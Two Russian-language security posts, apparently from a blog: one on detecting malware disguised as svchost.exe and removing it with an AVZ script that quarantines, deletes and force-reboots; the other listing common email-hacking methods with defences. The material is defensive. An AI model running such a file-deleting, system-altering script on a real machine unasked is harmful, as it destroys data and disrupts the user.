    Примечание: звёздочка в конце пути С:/WINDOWS/winsxs обозначает, что в папке winsxs может быть ещё один каталог. Как правило, он имеет длинное название из набора символов, например, amd64_3ware.inf.resources_31bf3856ad364e35_6.3..... В виде исключения из правил файл svchost.exe может располагаться в каталоге антишпионской программы Malwarebytes Anti-Malware.
    Если же он обнаружится в какой-нибудь другой папке, особенно в корневой Windows или в «Пользователи», то скорее всего вы имеете дело с маскирующимся вирусом. Проверить расположение файла svchost.exe можно из Диспетчера задач, кликнув по процессу правой кнопкой мыши и выбрав в меню опцию «Открыть расположение файла» либо с помощью сторонних утилит вроде Process Explorer. Используя сторонние файловые менеджеры, также можно выполнить поиск всех файлов svchost.exe по маске.
    Последний способ не столь надёжен, так как подделывающийся под процесс svchost вирус может использовать более хитрый способ маскировки. Так, в имени файла одна из латинских букв может быть заменена кириллической. Внешне такой файл ничем не будет отличаться от настоящего, более того, он может располагаться в том же каталоге, что и «правильный» svchost.exe. Впрочем, проверить его подлинность не составляет особого труда. Достаточно сравнить коды символов имени файла воспользовавшись таблицей символов Юникода. Иногда в название файла svchost добавляется лишняя буква, либо наоборот, пропускается. Невнимательный пользователь может и не заметить разницу между, скажем, svchost.exe и svhost.exe.
    Тем не менее, спешить удалять подозрительный svchost сходу не стоит. Для начала неплохо было бы проверить его на мульти антивирусном сервисе вроде VirusTotal и, если подозрительный файл окажется подделкой, хотя одна из антивирусных программ выдаст положительный результат. Вредоносный файл, маскирующийся под svchost удаляем с помощью Dr.Web LiveDisk либо утилиты AVZ. Если будете использовать AVZ, вам также понадобиться специальный скрипт
    Алгоритм удаления вируса в AVZ следующий: запускаем утилиты, в меню Файл выбираем опцию «Выполнить скрипт» после чего вставляем код скрипта из прилагаемого файла и нажимаем кнопку «Запустить». При этом будет выполнена перезагрузка компьютера.
    После старта проверяем, был ли удалён вирус и проводим полную проверку системного раздела антивирусным сканером.
    Скрипт для AVZ:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
    QuarantineFile('полный путь к вредоносному файлу','');
    DeleteFile('полный путь к вредоносному файлу');
    BC_ImportAll;
    ExecuteSysClean;
    ExecuteWizard('TSW',2,3,true);
    BC_Activate;
    RebootWindows(true);
    end.
    В скобках напротив команд QuarantineFile и DeleteFile нужно указать полный путь к вредоносному файлу. Например: ('C:\Windows\system\syshost.exe','');

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    Как злоумышленник взломает вашу почту?
    Рассмотрим наиболее распространенные приемы взлома электронной почты:
    Начнем с тяжелой артиллерии. Хакерские атаки на вашу электронную почту осуществляются компьютерными вирусами и троянскими программами. Для защиты используем антивирусы и (или) сетевые экраны. Конечно же,100% защиты использование антивируса не дает.
    2. Уязвимости почтовых серверов. Эта проблема из разряда высшей математики. Для ее решения целесообразно применять Почтовые клиенты.
    3. Применение программ-подборщиков паролей. Метод противодействия прост: выбираем надежные пароли! Не используем короткие пароли и мало букв, избегать ассоциаций (имена, клички, даты).
    4. Угадывание ответов на контрольные (секретные) вопросы. Девичья фамилия матери, имя домашнего питомца, номер паспорта или любимое блюдо – не такие уж и секретные сведения для злоумышленников.
    5. Социальная инженерия – использование методов психологии в решении криптографических задач. Вариантов множество: в соцсетях через список друзей узнать девичью фамилию матери или в фотографиях прочесть кличку собаки, отправить письмо от имени администрации сайта или техподдержки с просьбой выслать пароль, использовать фальшивую страничку почтового сервера для кражи ваших логина и пароля. В целях защиты будьте бдительны, внимательны и не доверяйте незнакомцам!

    post-img